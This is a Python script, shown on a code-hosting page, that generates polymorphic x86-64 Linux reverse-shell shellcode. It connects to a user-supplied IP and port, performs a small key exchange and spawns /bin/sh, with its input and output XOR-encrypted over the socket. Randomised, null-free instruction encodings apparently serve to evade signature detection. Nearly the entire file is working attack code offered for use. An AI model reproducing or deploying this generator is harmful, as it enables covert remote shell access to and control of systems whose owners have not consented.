-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathshellcodeGen.py
640 lines (474 loc) · 20.8 KB
/
shellcodeGen.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
#!/usr/bin/python3
import struct
import random
import argparse
import secrets
# Set a dictionary with all the register
registerDictionary = {"rax":0,"rcx":1,"rdx":2,"rbx":3,"rsp":4,"rbp":5,"rsi":6,"rdi":7}
ExtendedRegisterDictionary = {"r8":0,"r9":1,"r10":2,"r11":3,"r12":4,"r13":5,"r14":6,"r15":7}
# Set all register to 0
def setRegToZero(reg):
chunk = bytearray()
case = random.randint(1,3)
# Use match case for the different method
match case:
case 1: # Xor with itself method
xor = bytearray([0x48,0x31,(0xC0+(registerDictionary[reg]*9))])
chunk += xor
case 2: # Double shift right 32 method
shift = bytearray([0x48,0xC1,(0xE8+registerDictionary[reg]),0x20])
chunk += shift
chunk += shift
case 3: # push -1, pop and not
chunk.append(0x68)
value = bytearray(struct.pack("<i",-1))
for i in value :
chunk.append(i)
chunk.append((0x58+registerDictionary[reg]))
not_op = bytearray([0x48,0xf7,(0xD0+registerDictionary[reg])])
chunk += not_op
return chunk
# Move value to address with 1 and 0 management for avoiding null bytes
def preciseMovToMemory(value):
chunk = bytearray()
value = bytearray(value)
case = random.randint(1,1)
match case:
case 1: #mov to address method bytes per bytes
precisemov = bytearray([0x48,0x89,0xE3])
for i in range(len(value)):
key = random.randint(1,8)
precisemov.append(0xC6)
precisemov.append((0x03))
precisemov.append(value[i]+key)
precisemov.append(0x80)
precisemov.append(0x2B)
precisemov.append((0x00 + key))
precisemov.append(0x48)
precisemov.append(0xff)
precisemov.append(0xC3)
chunk += precisemov
return chunk
# Move value to register with different method
# it is only possible to move a value under or equal to 4 bytes
def movValueToReg(reg,value):
chunk = bytearray()
case = random.randint(1,4)
match case:
case 1: # The push, pop, neg method
chunk.append(0x68)
value = -value
value = bytearray(struct.pack("<i",value))
for i in value :
chunk.append(i)
chunk.append((0x58+registerDictionary[reg]))
neg = bytearray([0x48,0xf7,(0xD8+registerDictionary[reg])])
chunk += neg
case 2: # The push, pop, not method
chunk.append(0x68)
value = -value
value = bytearray(struct.pack("<i",value))
for i in value :
chunk.append(i)
chunk.append((0x58+registerDictionary[reg]))
not_op = bytearray([0x48,0xf7,(0xD0+registerDictionary[reg])])
chunk += not_op
inc_ope = bytearray([0x48,0xff,(0xC0+registerDictionary[reg])])
chunk += inc_ope
case 3: # the mov and shift method
value = bytearray(struct.pack(">q",value))
mov_n_shift = bytearray()
if reg in ("rax" , "rcx" , "rdx" , "rbx"):
for i in value:
mov_n_shift.append(0x48)
mov_n_shift.append(0xC1)
mov_n_shift.append((0xE0+registerDictionary[reg]))
mov_n_shift.append(0x08)
if i != 0:
mov_n_shift.append((0xb0+registerDictionary[reg]))
mov_n_shift.append(i)
chunk += mov_n_shift
else:
for i in value:
mov_n_shift.append(0x48)
mov_n_shift.append(0xC1)
mov_n_shift.append((0xE0+registerDictionary[reg]))
mov_n_shift.append(0x08)
if i != 0:
mov_n_shift.append(0x40)
mov_n_shift.append((0xb0+registerDictionary[reg]))
mov_n_shift.append(i)
chunk += mov_n_shift
case 4: # the mask method
while(True):
mask = secrets.token_bytes(4)
mask = int.from_bytes(mask)
complement = mask - value
complement = -complement
mask = bytearray(struct.pack("<I",mask))
complement = bytearray(struct.pack("<q",complement))
if 0x00 in complement or 0x00 in mask:
continue
break
mov = bytearray([(0xB8 + registerDictionary[reg])])
mov += mask
chunk += mov
if reg == "rax":
addition = bytearray([0x48, 0x05])
addition += complement[0:4]
else:
addition = bytearray([0x48,0x81,(0xC0 + registerDictionary[reg])])
addition += complement[0:4]
addition += bytearray([0x89, (0xC0 + registerDictionary[reg]*9)])
chunk += addition
return chunk
def movExtendedRegToReg(extendedregsrc,regdst):
chunk = bytearray()
case = random.randint(1,3)
match case:
case 1: #push and pop method
push = bytearray([0x41,0x50+(ExtendedRegisterDictionary[extendedregsrc])])
pop = bytearray([0x58+(registerDictionary[regdst])])
chunk += push
chunk += pop
case 2: #mov method
mov = bytearray([0x4C,0x89,(0xC0+(ExtendedRegisterDictionary[extendedregsrc]*8)+(registerDictionary[regdst]))])
chunk += mov
case 3: # The xor method
xor = setRegToZero(regdst)
xor += bytearray([0x4C,0x31,(0xC0+(ExtendedRegisterDictionary[extendedregsrc]*8)+(registerDictionary[regdst]))])
chunk += xor
return chunk
def movRegToExtendedReg(regsrc,extendedregdst):
chunk = bytearray()
case = random.randint(1,2)
match case:
case 1: #push and pop method
push = bytearray([0x50+(registerDictionary[regsrc])])
pop = bytearray([0x41,0x58+(ExtendedRegisterDictionary[extendedregdst])])
chunk += push
chunk += pop
case 2: #mov method
mov = bytearray([0x49,0x89,(0xC0+(registerDictionary[regsrc]*8)+(ExtendedRegisterDictionary[extendedregdst]))])
chunk += mov
return chunk
def saveMemoryValueToExtendedReg(offset,reg):
chunk = bytearray()
case = random.randint(1,1)
match case:
case 1: #mov to address method
if offset != 0:
mov = bytearray([0x44,0x8b, (0x44+(ExtendedRegisterDictionary[reg]*8)),0x24])
mov.append(offset)
else:
mov = bytearray([0x44,0x8b, (0x04+(ExtendedRegisterDictionary[reg]*8)),0x24])
chunk += mov
return chunk
# Move WORD size to memory with mov
def movWORDToMemory(offset,reg):
chunk = bytearray()
case = random.randint(1,1)
match case:
case 1: #mov to address method
mov = bytearray([0x66,0x89, (0x04+(registerDictionary[reg]*8)),0x24])
if offset != 0:
mov[2] += 0x40
mov.append(offset)
chunk += mov
return chunk
# Move DWORD size to memory with mov
def movDWORDToMemory(offset,reg):
chunk = bytearray()
case = random.randint(1,1)
match case:
case 1: #mov to address method
mov = bytearray([0x89, (0x04+(registerDictionary[reg]*8)),0x24])
if offset != 0:
mov[1] += 0x40
mov.append(offset)
chunk += mov
return chunk
# Move QWORD size to memory with mov
def movQWORDToMemory(offset,reg):
chunk = bytearray()
case = random.randint(1,1)
match case:
case 1: #mov to address method
mov = bytearray([0x48,0x89, (0x04+(registerDictionary[reg]*8)),0x24])
if offset != 0:
mov[2] += 0x40
mov.append(offset)
chunk += mov
return chunk
# Move BYTE size to memory with mov
def movBYTEToMemory(offset,reg):
chunk = bytearray()
case = random.randint(1,1)
match case:
case 1: #mov to address method
mov = bytearray([0x88, (0x04+(registerDictionary[reg]*8)),0x24])
if offset != 0:
mov[1] += 0x40
mov.append(offset)
chunk += mov
return chunk
# Move WORD to stack with push
def pushWORDToStack(reg):
chunk = bytearray()
case = random.randint(1,1)
match case:
case 1: #push to stack method
push = bytearray([0x66,0x50+(registerDictionary[reg])])
chunk += push
return chunk
# Move DWORD to stack with mov
def pushDWORDToStack(reg):
chunk = bytearray()
case = random.randint(1,1)
match case:
case 1: #push to stack method
push = bytearray([0x50+(registerDictionary[reg])])
chunk += push
return chunk
# Move register to register with different method
def movRegtoReg(regsrc,regdst):
chunk = bytearray()
case = random.randint(1,3)
match case:
case 1: #push and pop method
push = bytearray([0x50+(registerDictionary[regsrc])])
pop = bytearray([0x58+(registerDictionary[regdst])])
chunk += push
chunk += pop
case 2: #mov method
mov = bytearray([0x48,0x89,(0xC0+(registerDictionary[regsrc]*8)+(registerDictionary[regdst]))])
chunk += mov
case 3: # The xor method
xor = setRegToZero(regdst)
xor += bytearray([0x48,0x31,(0xC0+(registerDictionary[regsrc]*8)+(registerDictionary[regdst]))])
chunk += xor
return chunk
def saveRIPtoExtendedReg(extendedreg):
chunk = bytearray()
case = random.randint(1,1)
match case:
case 1: #jump over, call back, pop and jump forward method
chunk += bytearray([0xeb,0x04,0x41,(0x58 + ExtendedRegisterDictionary[extendedreg]) ,0xeb,0x05,0xe8])
chunk += struct.pack("<i", -9)
return chunk
def main():
# Arg definition
parser = argparse.ArgumentParser(description="Generate shellcode with IP and port arguments")
parser.add_argument("-i", "--ip", required=True, help="IP address")
parser.add_argument("-p", "--port", required=True, help="Port number")
args = parser.parse_args()
ip = args.ip
port = args.port
# Define format for the var
port = struct.pack("<h", int(port))
ip = ip.split(".")
ip = list(map(int,ip))
ip = bytearray(ip)
ip = bytes(ip)
ip = int.from_bytes(ip)
ip = struct.pack("<i", ip)
ip = int.from_bytes(ip)
port = int.from_bytes(port)
syscall = bytearray([0x0f,0x05])
# Generate the shellcode with all the fonctions and switch case
# sub something to rsp
shellcode = bytearray()
shellcode += movValueToReg("rdi",0x02) # Socket ARG0 : 2 = AF_INET
shellcode += movValueToReg("rsi",0x01) # Socket ARG1 : 1 = SOCK_STREAM
shellcode += setRegToZero("rdx") # SOCKET ARG2 ; 0 = IPPROTO_IP
shellcode += movValueToReg("rax",0x29) # Socket syscall Number
shellcode += syscall # socket
shellcode += movRegtoReg("rax","rdi") # Save Socket Number to RDI (Connect ARG0)
shellcode += movRegToExtendedReg("rax","r12") # Save Socket Number to R12
# Putting the Sockaddr Struct in memory
shellcode += movValueToReg("rax",0x0002) # WORD AF_INET
shellcode += movWORDToMemory(0,"rax")
shellcode +=movValueToReg("rax",port) # WORD PORT
shellcode += movWORDToMemory(2,"rax")
shellcode +=movValueToReg("rax",ip) # DWORD in_addr
shellcode += movDWORDToMemory(4,"rax")
shellcode += setRegToZero("rax") # QWORD Padding
shellcode += movQWORDToMemory(8,"rax")
shellcode += movRegtoReg("rsp","rsi") # Connect ARG1 : ptr* to Sockaddr Struct
shellcode += movValueToReg("rdx",0x10) # Connect ARG2 : Sockaddr_size
shellcode += movValueToReg("rax",0x2a) # Connect syscall number
shellcode += syscall # connect
###
diffie = movRegtoReg("rsp","rdi") # getrandom ARG0 : ptr* to buffer
diffie += movValueToReg("rsi",1) # getrandom ARG1 : size
diffie += setRegToZero("rdx") # getrandom ARG2 : flags
diffie += movValueToReg("rax",0x13e) # getrandom syscall number
diffie += syscall # getrandom
diffie += setRegToZero("rax") # setRegToZero rdx
diffie += movValueToReg("rdx",0x07) # diffie-hellman P, prime number 251
diffie += bytearray([0x8A,0x04,0x24]) # mov al, [rsp]
diffie += bytearray([0x48,0x39,0xD0]) # cmp rax, rdx
distance = len(diffie)
distance = -distance
distance = distance - 6
diffie += bytearray([0x0f,0x87])
diffie += struct.pack("<i",distance) # jump back if a is over 7
diffie += movRegtoReg("rax","rbx") # save a to rbx
diffie += movValueToReg("rax",0x99) # put g inside rax
diffie += movRegtoReg("rax","rsi") # put g inside rdx
diffie += movRegtoReg("rbx","rcx") # put a to rcx
power1 = bytearray([0x48,0xFF,0xC9]) # dec rcx
power1 += bytearray([0x48,0x85,0xC9]) # test rcx,rcx
power2 = bytearray([0x48,0xF7,0xE6]) # mul rsi
power1 += bytearray([0x74])
distance = struct.pack("<I",len(power2)+5)
distance = bytearray([distance[0]])
power1 += distance
power2 += bytearray([0xe9])
distance = len(power1) + len(power2)
distance = -distance
distance = distance - 4
power2 += struct.pack("<i",distance)
diffie += power1
diffie += power2
diffie += movValueToReg("rsi",251) # set rdx to 0
diffie += bytearray([0x48,0xF7,0xF6]) # div rsi = modulot 251, so rdx contains the modulo
diffie += movBYTEToMemory(0,"rdx") # save the modulo to the memory
diffie += movExtendedRegToReg("r12","rdi") # read ARG0 : socket N°
diffie += movRegtoReg("rsp","rsi") # read ARG1 : ptr* to buffer
diffie += movValueToReg("rdx",0x1) # read ARG2 : size
diffie += movValueToReg("rax",0x01) # write syscall number
diffie += syscall # write the buffer to socket
########### recv and establish common key ###########
diffie += movExtendedRegToReg("r12","rdi") # read ARG0 : socket N°
diffie += movRegtoReg("rsp","rsi") # read ARG1 : ptr* to buffer
diffie += movValueToReg("rdx",0x20) # read ARG2 : size
diffie += setRegToZero("rax") # read syscall number
diffie += syscall # read the socket fd
diffie += setRegToZero("rax") # setRegToZero rdx
diffie += bytearray([0x8A,0x04,0x24]) # mov al, [rsp]
diffie += movRegtoReg("rax","rsi") # put B inside rdx
diffie += movRegtoReg("rbx","rcx") # put a to rcx
power1 = bytearray([0x48,0xFF,0xC9]) # dec rcx
power1 += bytearray([0x48,0x85,0xC9]) # test rcx,rcx
power2 = bytearray([0x48,0xF7,0xE6]) # mul rsi
power1 += bytearray([0x74])
distance = struct.pack("<I",len(power2)+5)
distance = bytearray([distance[0]])
power1 += distance
power2 += bytearray([0xe9])
distance = len(power1) + len(power2)
distance = -distance
distance = distance - 4
power2 += struct.pack("<i",distance)
diffie += power1
diffie += power2
diffie += movValueToReg("rsi",251) # set rdx to 0
diffie += bytearray([0x48,0xF7,0xF6]) # div rsi = modulot 251, so rdx contains the modulo
diffie += movRegtoReg("rdx","rbx") # save the common key to rbx
diffie += movRegToExtendedReg("rbx", "r14")
shellcode += diffie
########### recv and establish common key ###########
shellcode += movRegtoReg("rsp", "rdi") # Pipe ARG1 : ptr* to pipe[0,1]
shellcode += movValueToReg("rax",0x16) # pipe syscall number
shellcode += syscall # pipe
shellcode += saveMemoryValueToExtendedReg(0,"r8") # Save pipe1[0] to r8
shellcode += saveMemoryValueToExtendedReg(4,"r9") # Save pipe1[1] to r9
shellcode += movRegtoReg("rsp", "rdi") # Pipe ARG1 : ptr* to pipe[0,1]
shellcode += movValueToReg("rax",0x16) # pipe syscall number
shellcode += syscall # pipe
shellcode += saveMemoryValueToExtendedReg(0,"r10") # Save pipe2[0] to r10
shellcode += saveMemoryValueToExtendedReg(4,"r13") # Save pipe2[1] to r13
shellcode += movExtendedRegToReg("r8","rdi") # Dup2 ARG0 : pipe1[0]
shellcode += setRegToZero("rsi") # Dup2 ARG1 : 0 STDIN
shellcode += movValueToReg("rax",0x21) # Dup2 syscall number
shellcode += syscall # dup2
shellcode += movExtendedRegToReg("r13","rdi") # Dup2 ARG0 : pipe2[1]
shellcode += movValueToReg("rsi",0x01) # Dup2 ARG1 : 1 STDOUT
shellcode += movValueToReg("rax",0x21) # Dup2 syscall number
shellcode += syscall # dup2
shellcode += movExtendedRegToReg("r13","rdi") # Dup2 ARG0 : pipe2[1]
shellcode += movValueToReg("rsi",0x02) # Dup2 ARG1 : 2 STDERR
shellcode += movValueToReg("rax",0x21) # Dup2 syscall number
shellcode += syscall # dup2
shellcode += movValueToReg("rax",0x39) # Fork syscall number
shellcode += syscall # fork
shellcode += bytearray([0x48,0x85,0xC0]) # test rax,rax
parent_shellcode = preciseMovToMemory(b'/bin/sh\x00') # Putting /bin/sh string in memory
parent_shellcode += movRegtoReg("rsp","rdi") # execve ARG0 : Ptr* to command
parent_shellcode += setRegToZero("rsi") # execve ARG1 : Args
parent_shellcode += setRegToZero("rdx") # execve ARG2 : Env
parent_shellcode += movValueToReg("rax",0x3b) # execve syscall number
parent_shellcode += syscall # execve
distance = bytearray(struct.pack("<I",len(parent_shellcode)))
distance = distance[0]
shellcode += bytearray([0x74,distance]) # jne distance
shellcode += parent_shellcode
shellcode += saveRIPtoExtendedReg("r15") # Save RIP to r15
child_shellcode = movExtendedRegToReg("r12","rdi") # read ARG0 : socket N°
child_shellcode += movRegtoReg("rsp","rsi") # read ARG1 : ptr* to buffer
child_shellcode += movValueToReg("rdx",0x100) # read ARG2 : size
child_shellcode += setRegToZero("rax") # read syscall number
child_shellcode += syscall # read the socket fd
#####
encryptloop = movExtendedRegToReg("r14","rdx") # retreive the common key
encryptloop += setRegToZero("rcx")
setup = len(encryptloop)
encryptloop += bytearray([0x30,0x14,0x0C])
encryptloop += bytearray([0x48,0x39,0xC1])
encryptloop += bytearray([0x48,0xff,0xc1])
distance = len(encryptloop)
distance = -distance
distance = distance - 6
distance = distance + setup
encryptloop += bytearray([0x0f,0x86])
encryptloop += struct.pack("<i",distance)
child_shellcode += encryptloop
#####
child_shellcode += movExtendedRegToReg("r9","rdi") # write ARG0 pipe2[1]
child_shellcode += movRegtoReg("rsp","rsi") # read ARG1 : ptr* to buffer
child_shellcode += movRegtoReg("rax","rdx") # read ARG2 : size
child_shellcode += movValueToReg("rax",0x01) # write syscall number
child_shellcode += syscall # write the buffer to the pipe2[1]
child_shellcode += movExtendedRegToReg("r10","rdi") # read ARG0 pipe1[0]
child_shellcode += movRegtoReg("rsp","rsi") # read ARG1 : ptr* to buffer
child_shellcode += movValueToReg("rdx",0x100) # read ARG2 : size
child_shellcode += setRegToZero("rax") # read syscall number
child_shellcode += syscall # read pipe1[0]
#####
encryptloop = movExtendedRegToReg("r14","rdx") # retreive the common key
encryptloop += setRegToZero("rcx")
setup = len(encryptloop)
encryptloop += bytearray([0x30,0x14,0x0C])
encryptloop += bytearray([0x48,0x39,0xC1])
encryptloop += bytearray([0x48,0xff,0xc1])
distance = len(encryptloop)
distance = -distance
distance = distance - 6
distance = distance + setup
encryptloop += bytearray([0x0f,0x86])
encryptloop += struct.pack("<i",distance)
child_shellcode += encryptloop
#####
child_shellcode += movExtendedRegToReg("r12","rdi") # read ARG0 : socket N°
child_shellcode += movRegtoReg("rsp","rsi") # read ARG1 : ptr* to buffer
child_shellcode += movRegtoReg("rax" , "rdx") # read ARG2 : size
child_shellcode += movValueToReg("rax",0x01) # write syscall number
child_shellcode += syscall # write the buffer to the pipe2[1]
shellcode += child_shellcode
shellcode += bytearray([0x41,0xFF,0xE7])
# Format output
print("Shellcode Length: {}".format(len(shellcode)))
print("RAW hellcode: ",end='\n\n')
for i in shellcode:
if i < 16:
print("0{}".format(hex(i).lstrip("0x")),end='')
else:
print("{}".format(hex(i).lstrip("0x")),end='')
print("\n\nFormatted hellcode: ",end='\n\n')
for i in shellcode:
if i < 16:
print("\\x0{}".format(hex(i).lstrip("0x")),end='')
else:
print("\\x{}".format(hex(i).lstrip("0x")),end='')
main()